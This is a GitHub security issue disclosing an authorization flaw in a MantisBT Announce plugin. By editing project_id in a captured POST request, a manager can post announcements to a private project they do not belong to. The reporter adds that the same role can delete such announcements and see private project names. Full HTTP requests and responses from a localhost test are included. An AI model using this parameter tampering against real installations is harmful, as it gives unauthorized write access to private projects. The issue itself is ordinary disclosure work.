Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Non authenticated member can post a news to a private project #55

Open
jrckmcsb opened this issue Oct 12, 2020 · 0 comments
Open

Non authenticated member can post a news to a private project #55

jrckmcsb opened this issue Oct 12, 2020 · 0 comments
Labels
security

Comments

@jrckmcsb
Copy link

When the admin enable the news section a new stuffs will appear like the main field which will use for announcement/news. Some user can have access on it (manager). However it seems that a lot of security issue introduce here..

Description

This allows the attacker to post announcement on a private project even you are not part of it

Steps to produce

  • Create two projects public and private
  • enable the news
  • As admin post a news to that private project

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=7usorjepb776qjidi5qsg8elb8; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=c16e1a2abfe29f2ae0cd4722fa1d69c8883f2fb7ed79ca412b5b72293cb1e84b; MANTIS_MANAGE_USERS_COOKIE=0%3Ausername%3AASC%3A0; MANTIS_BUG_LIST_COOKIE=9
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002ulRDzusShT_qtfzjQvzOJrSdwaEg2G05&title=AWESOME+NEWS+FOR+PRIVATE+PROJECT&message=AWESOME+NEWS+FOR+PRIVATE+PROJECT&location=header&project_id=1&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:27:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:27:51 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:27:51 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
  • Here I using a private project with project_id of 1

Manager as attacker

  • Create a new announcement

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|monitored:1; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=24tihn6miqrj33tjrdleo94ef4; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=v7kQ0OCxCPCnyNcBXEGWqV5Oj4UaowOhahhT0UBedcplivtLAgZS-zGkJQOFiIMj; MANTIS_BUG_LIST_COOKIE=5%2C1%2C4
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002mANdg2UBhW7V-buExLRrPmNcxZ3HrCN2&title=This+is+some+announcement+for+public+project&message=This+is+some+announcement+for+public+project&location=header&project_id=0&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:35:36 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:35:36 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:35:36 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
  • Do the same thing but this time edit the project_id to any private project
  • Send it
  • The news will send to that private project

Some notes

These are the stuffs that I observe but I am not sure if this is just part of the configuration feature (this can be prevent if the admin just set the configuration to admin..)

Delete news for private project

  • allows the manager to delete the news/announcement for that private project

View the private project name

  • allows to disclose the private project name
    news

All these stuffs can be done after going to plugin.php?page=Announce/list I just add this information.... I believe these issues should be consider to fix/update
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
security
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@dregad @jrckmcsb